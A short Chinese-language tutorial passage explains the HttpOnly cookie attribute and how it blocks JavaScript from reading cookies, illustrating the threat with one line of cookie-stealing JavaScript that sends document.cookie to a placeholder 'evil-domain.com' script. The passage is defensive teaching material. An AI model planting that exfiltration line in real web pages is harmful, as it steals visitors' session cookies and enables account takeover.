所謂" 不能通過js腳本獲取 " 主要指的是: 使用document.cookie / XMLHttpRequest對象 / Request API 等無法獲取到當前cookie. 設置方法為: HttpOnly. 沒錯, 這是一個沒有值的屬性, 只要在 Set-Cookie里面附帶了這個屬性, 那么這個cookie就不能被js腳本所獲取.
注意:
HttpOnly可以減少惡意代碼的攻擊, 比如下面這個代碼就可以給第三方網站發送cookie, 如果使用了HttpOnly, 則不會被竊取.
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;